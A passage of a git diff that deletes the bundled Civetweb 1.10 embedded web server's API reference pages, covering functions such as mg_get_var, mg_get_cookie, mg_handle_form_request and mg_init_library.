-The function `mg_exit_library()` should be called from an application program, when the library should be unloaded.
-It must be called only from one thread (it is not guaranteed to be thread safe).
-
-Only use `mg_exit_library( );` when you used [`mg_init_library( feature );`](api/mg_init_library.md) before.
-
-The library init and exit functions are new in version 1.9 (as dummy implementation) and effective only from version 1.10.
-For compatibility reasons, other functions (such as [`mg_start();`](mg_start.md)) will initialize the required features as well,
-but they will no longer do a de-initialization, leaving a memory leak when the library is unloaded.
-
-### See Also
-
-* [`mg_init_library( feature );`](mg_init_library.md)
-* [`mg_check_feature( feature );`](mg_check_feature.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_form_data_handler.md b/thirdparty/civetweb-1.10/docs/api/mg_form_data_handler.md
deleted file mode 100644
index 2338b72..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_form_data_handler.md
+++ /dev/null
@@ -1,36 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_form_data_handler;`
-
-### Fields
-
-|Field|Description|
-|:---|:---|
-|**`field_found`**|**`int field_found( const char *key, const char *filename, char *path, size_t pathlen, void *user_data )`**;|
-||The callback function `field_found()` is called when a new field has been found. The return value of this callback is used to define how the field should be processed. The parameters contain the following information:|
-||**`key`** - The name of the field as it was named with the `name` tag in the HTML source.|
-||**`filename`** - The name of the file to upload. Please not that this parameter is only valid when the input type was set to `file`. Otherwise this parameter has the value `NULL`.|
-||**`path`** - This is an output parameter used to store the full name of the file including the path to store an incoming file at the computer. This parameter must be provided by the application to Civetweb when a form field of type `file` is found. Please not that together with setting this parameter, the callback function must return `FORM_FIELD_STORAGE_STORE`.i With any other return value the contents of the `path` buffer is ignored by Civetweb.|
-||**`pathlen`** - The length of the buffer where the output path can be stored.|
-||**`user_data`** - A pointer to the value of the field `user_data` of the structure `struct mg_form_data_handler`.|
-||The callback function `field_found()` can return the following values back to Civetweb:|
-||**`FORM_FIELD_STORAGE_SKIP`** - Ignore the field and continue with processing the next field|
-||**`FORM_FIELD_STORAGE_GET`** - Call the callback function `field_get()` to receive the form data|
-||**`FORM_FIELD_STORAGE_STORE`** - Store a file as `path` and overwrite that file if it already exists|
-||**`FORM_FIELD_STORAGE_ABORT`** - Stop parsing the request and ignore all remaining form fields|
-|**`field_get`**|**`int field_get( const char *key, const char *value, size_t valuelen, void *user_data );`**|
-|**`field_store`**|**`int field_store( const char *path, long long file_size, void *user_data );`**|
-||If the callback function `field_found()` returned `FORM_FIELD_STORAGE_STORE`, Civetweb will try to store the received data in a file. If writing the file is successful, the callback function `field_store()` is called. This function is only called after completion of a full upload, not if a file has only partly been uploaded. When only part of a file is received, Civetweb will delete that partly upload in the background and not inform the main application through this callback. The following parameters are provided in the function call:|
-||**`path`** -|
-||**`file_size`** - The path on the server where the file was stored|
-||**`user_data`** - The size of the stored file in bytes|
-|**`user_data`**|**`void *`** The value of the field `user_data` when the callback functions were registered with a call to `mg_handle_form_request();`|
-||The `user_data` field is a user supplied argument that will be passed as parameter to each of callback functions|
-
-### Description
-
-The structure `struct mg_form_data_handler` contains callback functions for handling form fields. Form fields give additional information back from a web page to the server which can be processed by these callback functions.
-
-### See Also
-
-* [`mg_handle_form_request();`](mg_handle_form_request.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_builtin_mime_type.md b/thirdparty/civetweb-1.10/docs/api/mg_get_builtin_mime_type.md
deleted file mode 100644
index c9044ae..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_builtin_mime_type.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_builtin_mime_type( file_name );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`file_name`**|`const char *`|The name of the file for which the MIME type has to be determined|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`|A text string describing the MIME type|
-
-### Description
-
-The function `mg_get_builtin_mime_type()` tries to determine the MIME type of a given file. If the MIME type cannot be determined, the value `text/plain` is returned. Please note that this function does not an intelligent check of the file contents. The MIME type is solely determined based on the file name extension.
-
-### See Also
-
-* [`mg_send_mime_file();`](mg_send_mime_file.md)
-* [`mg_send_mime_file2();`](mg_send_mime_file2.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_connection_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_connection_info.md
deleted file mode 100644
index 14a2f68..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_connection_info.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_connection_info( ctx, idx, buffer, buflen );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The server context handle|
-|**`idx`**|`int`|Connection index within the context|
-|**`buffer**|`char *`|A string buffer to store the information|
-|**`buflen**|`int`|Size of the string buffer (including space for a terminating 0)|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Available context information in bytes (excluding the terminating 0)|
-
-### Description
-
-The function `mg_get_connection_info()` returns statistics information collected for 
-a server connection index.  This may be empty if the server has not been built with 
-statistics support (`#define USE_SERVER_STATS`). 
-If data is available, the returned string is in JSON format. The exact content may
-vary, depending on the connection state and server version.
-
-### Note
-
-This is an experimental interface and may be changed, replaced
-or even removed in the future. Currently the index `idx` must be
-between `0` and `num_threads-1`. The thread is not locked for
-performance reasons, so the information may be inconsistent 
-in rare cases.
-
-### See Also
-
-* [`mg_get_system_info();`](mg_get_system_info.md)
-* [`mg_get_context_info();`](mg_get_context_info.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_context.md b/thirdparty/civetweb-1.10/docs/api/mg_get_context.md
deleted file mode 100644
index ce6cb2b..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_context.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_context( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection for which the context has to be returned|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_context *`|A pointer to the context of the given connection|
-
-### Description
-
-The function `mg_get_context()` returns the context associated with a connection.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
-* [`mg_stop();`](mg_stop.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_context_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_context_info.md
deleted file mode 100644
index 88ffcf7..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_context_info.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_context_info( ctx, buffer, buflen );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The server context handle|
-|**`buffer**|`char *`|A string buffer to store the information|
-|**`buflen**|`int`|Size of the string buffer (including space for a terminating 0)|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Available context information in bytes (excluding the terminating 0)|
-
-### Description
-
-The function `mg_get_context_info()` returns statistics information collected for
-the server context.  This may be empty if the server has not been built with
-statistics support (`#define USE_SERVER_STATS`).
-If data is available, the returned string is in JSON format. The exact content may
-vary, depending on the server state and server version.
-
-### See Also
-
-* [`mg_get_system_info();`](mg_get_system_info.md)
-* [`mg_get_connection_info();`](mg_get_connection_info.md)
-
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_cookie.md b/thirdparty/civetweb-1.10/docs/api/mg_get_cookie.md
deleted file mode 100644
index a738bc0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_cookie.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_cookie( cookie, var_name, buf, buf_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`cookie`**|`const char *`|The cookie name|
-|**`var_name`**|`const char *`|The variable name|
-|**`buf`**|`char *`|The buffer where to store the contents of the cookie|
-|**`buf_len`**|`size_t`|The length of the cookie buffer, including the terminating NUL|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The length of the cookie or an error code|
-
-### Description
-
-The function `mg_get_cookie()` tries to fetch the value of a certain cookie variable. The contents will either be stored in an application provided buffer, or an error code will be returned. The destination buffer is guaranteed to be NUL terminated if the pointer of the buffer is not a NULL pointer and the size of the buffer is at least one byte.
-
-If the function succeeds, the return value of the function is the length in bytes of the cookie. The value **`-1`** is returned if the requested cookie could not be found and **`-2`** if the destination buffer is represented by a NULL pointer, is zero length or too short to store the whole cookie.
-
-### See Also
-
-* [`mg_get_var();`](mg_get_var.md)
-* [`mg_get_var2();`](mg_get_var2.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_header.md b/thirdparty/civetweb-1.10/docs/api/mg_get_header.md
deleted file mode 100644
index 8ad1810..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_header.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_header( conn, name );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer referencing the connection |
-|**`name`**|`const char *`| The name of the request header |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`| A pointer to the value of the request header, or NULL of no matching header count be found |
-
-### Description
-
-HTTP and HTTPS clients can send request headers to the server to provide details about the communication. These request headers can for example specify the preferred language in which the server should respond and the supported compression algorithms. The function `mg_get_header()` can be called to return the contents of a specific request header. The function will return a pointer to the value text of the header when succesful, and NULL of no matching request header from the client could be found.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_option.md b/thirdparty/civetweb-1.10/docs/api/mg_get_option.md
deleted file mode 100644
index b731dd7..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_option.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_option( ctx, name );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`const struct mg_context *`| A pointer to the webserver context |
-|**`name`**|`const char *`| The name of the option to query |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`| A pointer to the option value in text, or NULL if an error occured |
-
-### Description
-
-When starting the CivetWeb webserver, options are provided to set the wanted behaviour of the server. The options which were used during startup can be queried through the `mg_get_option()` function. Options are read-only and cannot be changed while the webserver is running. The function returns a pointer to a text string containing the value of the queried option, or NULL if an error occured. It is guaranteed however that if a valid option name is provided as a parameter to this function, that a pointer to a string is returned and not NULL. In case an option was empty or NULL during initialisation, `mg_get_option()` will return a pointer to an empty string.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_ports.md b/thirdparty/civetweb-1.10/docs/api/mg_get_ports.md
deleted file mode 100644
index ba492ca..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_ports.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Civetweb API Reference
-
-### ~~`mg_get_ports( ctx, size, ports, ssl );`~~
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`const struct mg_context *`||
-|**`size`**|`size_t`|The number of ports which can be stored in the buffer|
-|**`ports`**|`int *`|Buffer for storage of the port numbers|
-|**`ssl`**|`int *`|Buffer used to store if SSL is used for the ports|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`size_t`|The number of ports stored in the buffer|
-
-### Description
-
-This function is deprecated. Use [`mg_get_server_ports()`](mg_get_server_ports.md) instead.
-
-The function `mg_get_ports()` returns a list of ports the Civetweb server is listening on. The port numbers are stored in a buffer of integers which is supplied by the calling party. The function also stores information if SSL is used on the ports. This information is stored in a second buffer which should be capable of storing the same amount of items as the ports buffer.
-
-The function returns the number of ports actually stored in the buffer.
-
-### See Also
-
-* [`struct mg_server_ports;`](mg_server_ports.md)
-* [`mg_get_server_ports();`](mg_get_server_ports.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_request_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_request_info.md
deleted file mode 100644
index b7ddd07..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_request_info.md
+++ /dev/null
@@ -1,28 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_request_info( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection for which the request info is needed|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const struct mg_request_info *`|Pointer to the requested info, or NULL if an error occured|
-
-### Description
-
-The function `mg_get_request_info()` returns information about the request on a given connection. This information is returned as a pointer to a [`mg_request_info`](mg_request_info.md) structure. If an error occurs, a NULL pointer is returned instead.
-
-Use this function when implementing a server.
-
-### See Also
-
-* [`struct mg_request_info;`](mg_request_info.md)
-* [`mg_get_response_info();`](mg_get_response_info.md)
-* [`struct mg_response_info;`](mg_response_info.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_request_link.md b/thirdparty/civetweb-1.10/docs/api/mg_get_request_link.md
deleted file mode 100644
index d58a592..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_request_link.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_request_link( conn, buf, buflen );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer referencing the connection |
-|**`buf`**|`char *`| A buffer to store the link |
-|**`buflen`**|`size_t`| Size of the buffer |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| Return code: <0 for error, >=0 for success |
-
-### Description
-
-Store a formatted link corresponding to the current request.
-
-E.g., returns
-`http://mydomain.com:8080/path/to/callback.ext`
-or 
-`http://127.0.0.1:8080/path/to/callback.ext`
-depending on the auth check settings.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_response.md b/thirdparty/civetweb-1.10/docs/api/mg_get_response.md
deleted file mode 100644
index 3e7b727..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_response.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_response( conn, ebuf, ebuf_len, timeout );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection to listen on|
-|**`ebuf`**|`char *`|Buffer to store an error message|
-|**`ebuf_len`**|`size_t`|Size of the error message buffer including the terminating NUL|
-|**`timeout`**|`int`|Time to wait for a response in milliseconds|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Success value of the wait|
-
-### Description
-
-The function `mg_get_reponse()` wait for a response from a remote server. A return value equal or greater than zero is an indication for success, a negative value us used to signal an error condition. A timeout can be specified which lets the function return after a specified number of milliseconds, even if no data is received from the remote party. If the timeout value is negative, the function will not return until data has been read or an unrecoverable error occurs.
-
-Error messages are stored in a caller supplied error message buffer.
-
-### See Also
-
-* [`mg_connect_client();`](mg_connect_client.md)
-* [`mg_connect_client_secure();`](mg_connect_client_secure.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_response_code_text.md b/thirdparty/civetweb-1.10/docs/api/mg_get_response_code_text.md
deleted file mode 100644
index 79ffa13..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_response_code_text.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_response_code_text( conn, response_code );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer referencing the connection |
-|**`response_code`**|`int`| Response code for which the text is queried |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`| A pointer to a human readable text explaining the response code. |
-
-### Description
-
-The function `mg_get_response_code_text()` returns a pointer to a human readable text describing the HTTP response code which was provided as a parameter.
-
-### See Also
-
-* [`mg_get_builtin_mime_type();`](mg_get_builtin_mime_type.md)
-* [`mg_version();`](mg_version.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_response_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_response_info.md
deleted file mode 100644
index 40e7ab8..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_response_info.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_response_info( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection for which the response info is needed|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const struct mg_request_info *`|Pointer to the requested info, or NULL if an error occured|
-
-### Description
-
-The function `mg_response_info()` returns information about a response on a client connection opened by `mg_connect_client()`. If an error occurs, a NULL pointer is returned instead.
-
-Use this function when implementing a client.
-
-### See Also
-
-* [`struct mg_response_info;`](mg_response_info.md)
-* [`mg_connect_client();`](mg_connect_client.md)
-* [`mg_get_request_info();`](mg_get_request_info.md)
-* [`struct mg_request_info;`](mg_request_info.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_server_ports.md b/thirdparty/civetweb-1.10/docs/api/mg_get_server_ports.md
deleted file mode 100644
index 323b470..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_server_ports.md
+++ /dev/null
@@ -1,28 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_server_ports( ctx, size, ports );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`const struct mg_context *`|The context for which the server ports are requested|
-|**`size`**|`int`|The size of the buffer to store the port information|
-|**`ports`**|`struct mg_server_ports *`|Buffer to store the port information|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The actual number of ports returned, or an error condition|
-
-### Description
-
-The `mg_get_server_ports()` returns a list with server ports on which the Civetweb server is listening. The ports are returned for a given context and stored with additional information like the SSL and redirection state in a list of structures. The list of structures must be allocated by the calling routine. The size of the structure is also passed to `mg_get_server_ports()`.
-
-The function returns the number of items in the list, or a negative value if an error occured.
-
-### See Also
-
-* [~~`mg_get_ports();`~~](mg_get_ports.md)
-* [`struct mg_server_ports;`](mg_server_ports.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_system_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_system_info.md
deleted file mode 100644
index 6add98d..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_system_info.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_system_info( buffer, buflen );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`buffer**|`char *`|A string buffer to store the information|
-|**`buflen**|`int`|Size of the string buffer (including space for a terminating 0)|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Available system information in bytes (excluding the terminating 0)|
-
-### Description
-
-The function `mg_get_system_info()` returns information collected for the system 
-(operating system, compiler, version, ...). 
-Currently this data is returned as string is in JSON format, but changes to the 
-format are possible in future versions.  The exact content of the JSON object may vary, 
-depending on the operating system and server version.
-This string should be included for support requests.
-
-### See Also
-
-* [`mg_get_context_info();`](mg_get_context_info.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_user_connection_data.md b/thirdparty/civetweb-1.10/docs/api/mg_get_user_connection_data.md
deleted file mode 100644
index 2e24c13..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_user_connection_data.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_user_connection_data( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection for which to return the user data|
-
-### Return Value
-
-| Type | Description | 
-| :--- | :--- |
-|`void *`|A pointer to the user data, or NULL if no user data was registered with the connection|
-
-### Description
-
-The function `mg_get_user_connection_data()` returns the user data associated with a connection. This user data is represented with a pointer which has been prevously registered with a call to [`mg_set_user_connection_data();`](mg_set_user_connection_data.md). With this function it is possible to pass state information between callback functions refering to a specific connection.
-
-### See Also
-
-* [`mg_set_user_connection_data();`](mg_set_user_connection_data.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_user_data.md b/thirdparty/civetweb-1.10/docs/api/mg_get_user_data.md
deleted file mode 100644
index 87bbe04..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_user_data.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_user_data( ctx );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`const struct mg_context *`|The context for which the user data is requested|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`void *`||
-
-### Description
-
-The function `mg_get_user_data()` returns the user data associated with a Civetweb context. This is a pointer value which has previously been used in the call to [`mg_start()`](mg_start.md) to initialize the server context.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_valid_option_names.md b/thirdparty/civetweb-1.10/docs/api/mg_get_valid_option_names.md
deleted file mode 100644
index c6b43ad..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_valid_option_names.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### ~~`mg_get_valid_option_names();`~~
-
-### Parameters
-
-*none*
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char **`|An array with strings where the even elements represent the option names, and the odd element the option values The array is NULL terminated.|
-
-### Description
-
-The function `mg_get_valid_option_names()` is depricated. Use [`mg_get_valid_options()`](mg_get_valid_options.md) instead.
-
-This function returns an array with option/value pairs describing the valid configuration options for Civetweb. En element value of NULL signals the end of the list.
-
-### See Also
-
-* [`struct mg_option;`](mg_option.md)
-* [`mg_get_valid_options();`](mg_get_valid_options.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_valid_options.md b/thirdparty/civetweb-1.10/docs/api/mg_get_valid_options.md
deleted file mode 100644
index fd6755e..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_valid_options.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_valid_options();`
-
-### Parameters
-
-*none*
-
-### Return Value
-
-| Type | Description | 
-| :--- | :--- |
-|`const struct mg_option *`|An array with all valid configuration options|
-
-### Description
-
-The function `mg_get_valid_options()` returns an array with all valid configuration options of Civetweb. Each element in the array is a structure with three fields which represent the name of the option, the value of the option and the type of the value. The array is terminated with an element for which the name is `NULL`. See for more details about this structure the documentation of [`struct mg_option`](mg_option.md).
-
-### See Also
-
-* [`struct mg_option;`](mg_option.md)
-* [`mg_start();`](mg_start.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_var.md b/thirdparty/civetweb-1.10/docs/api/mg_get_var.md
deleted file mode 100644
index c21c7bb..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_var.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_var( data, data_len, var_name, dst, dst_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`data`**|`const char *`|Encoded buffer from either POST data or the URI of a GET call|
-|**`data_len`**|`size_t`|Size of the encode buffer including the terminating NULL|
-|**`var_name`**|`const char *`|Name of the variable to search for|
-|**`dst`**|`char *`|Output buffer to store the content of the variable|
-|**`dst_len`**|`size_t`|Length of the output buffer|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The length of the variable or an error code|
-
-### Description
-
-The function `mg_get_var()` returns the value of a variable which is passed to the server with either a POST method, or as a parameter in the URI of a GET call. The data pointer passed to the function points to a form-URI encoded buffer. This can either be POST data or the `request_info.query_string`. The name of the searched variable and a buffer to store the results are also parameters to the function.
-
-The function either returns the length of the variable when successful, **`-1`** if the variable could not be found and **`-2`** if the destination buffer is NULL, has size zero or is too small to store the resulting variable value.
-
-### See Also
-
-* [`mg_get_cookie();`](mg_get_cookie.md)
-* [`mg_get_var2();`](mg_get_var2.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_var2.md b/thirdparty/civetweb-1.10/docs/api/mg_get_var2.md
deleted file mode 100644
index 3a47d91..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_var2.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_var2( data, data_len, var_name, dst, dst_len, occurrence );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`data`**|`const char *`|Encoded data buffer from either POST data or a GET URI|
-|**`data_len`**|`size_t`|The size of the encoded data buffer|
-|**`var_name`**|`const char *`|The name of the variable to search for|
-|**`dst`**|`char *`|Destination buffer to store the variable content|
-|**`dst_len`**|`size_t`|The size of the destination buffer including the terminating NUL|
-|**`occurrence`**|`size_t`|The instance index of the wanted variable|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Length of the variable contents, or an error code|
-
-### Description
-
-The function `mg_get_var2()` can be used to return the contents of a variable passed to the server as either POST data, or in the URI in a GET call. The function is somilar to [`mg_get_var()`](mg_get_var.md) but the difference is that `mg_get_var2()` can be used if the same variable is present multiple times in the data. The `occurence` parameter is used to identify which instance of the variable must be returned where **`0`** is used for the first variable with the specified name, **`1`** for the second and so on.
-
-The function returns the length of the variable content in the return buffer, **`-1`** if a variable with the specified name could not be found and **`-2`** if the pointer to the result buffer is NULL, the size of the result buffer is zero or when the result buffer is too small to contain the variable content and terminating NUL.
-
-### See Also
-
-* [`mg_get_cookie();`](mg_get_cookie.md)
-* [`mg_get_var();`](mg_get_var.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_handle_form_request.md b/thirdparty/civetweb-1.10/docs/api/mg_handle_form_request.md
deleted file mode 100644
index 4a1d888..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_handle_form_request.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_handle_form_request( conn, fdh );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection on which form data must be processed|
-|**`fdh`**|`struct mg_form_data_handler`|Structure with callback functions to to the heavy work|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The number of fields processed, or an error code|
-
-### Description
-
-The function `mg_handle_form_request()` processes form data on a connection. The function uses callback functions for the heavy lifting which are passed to the function as fields in a [`struct mg_form_data_handler`](mg_form_data_handler.md) structure. The number of processed fields is returned by the function, or a negative value when an error occured. I nthe situation where some fields are processed successfully (for example file downloads) and an error occurs later in the form processing, the function still returns a negative value. It is the responsibility of the calling party to do the necessary cleanup. The calling party should also do the cleanup of any files which are created, but not required anymore later.
-
-### See Also
-
-* [`struct mg_form_data_handler;`](mg_form_data_handler.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_header.md b/thirdparty/civetweb-1.10/docs/api/mg_header.md
deleted file mode 100644
index 403dc88..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_header.md
+++ /dev/null
@@ -1,18 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_header;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`name`**|`const char *`| The name of the client request header |
-|**`value`**|`const char *`| The value of the client request header |
-
-### Description
-
-The structure `mg_header` is used as a sub-structure in the [`struct mg_request_info;`](mg_request_info.md) structure to store the name and value of one HTTP request header as sent by the client.
-
-### See Also
-
-* [`struct mg_request_info;`](mg_request_info.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_init_library.md b/thirdparty/civetweb-1.10/docs/api/mg_init_library.md
deleted file mode 100644
index f0d2c46..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_init_library.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# Civetweb API Reference
-
-### `mg_init_library( feature );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`feature`**|`unsigned`| A bitmask indicating the features to be ininialized |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`unsigned`| A value indicating the initialized features is available. **0** is returned or error |
-
-### Description
-
-The function `mg_init_library()` should be called from an application program before using any other function.
-It must be called only from one thread (it is not guaranteed to be thread safe).
-
-This function is new in version 1.9 (as dummy implementation) and effective only from version 1.10.
-For compatibility reasons, other functions (such as [`mg_start();`](mg_start.md)) will initialize the required features as well,
-but they will no longer do a de-initialization, leaving a memory leak when the library is unloaded.
-
-The following parameter values can be used:
-
-| Value | Compilation option | Description |
-| :---: | :---: | :--- |
-| **1** | NO_FILES | *Able to serve files*.  If this feature is available, the webserver is able to serve files directly from a directory tree. |
-| **2** | NO_SSL | *Support for HTTPS*. If this feature is available, the webserver van use encryption in the client-server connection. SSLv2, SSLv3, TLSv1.0, TLSv1.1 and TLSv1.2 are supported depending on the SSL library CivetWeb has been compiled with, but which protocols are used effectively when the server is running is dependent on the options used when the server is started. |
-| **4** | NO_CGI | *Support for CGI*. If this feature is available, external CGI scripts can be called by the webserver. |
-| **8** | USE_IPV6 | *Support IPv6*. The CivetWeb library is capable of communicating over both IPv4 and IPv6, but IPv6 support is only available if it has been enabled at compile time. |
-| **16** | USE_WEBSOCKET | Support for web sockets. WebSockets support is available in the CivetWeb library if the proper options has been used during cimpile time. |
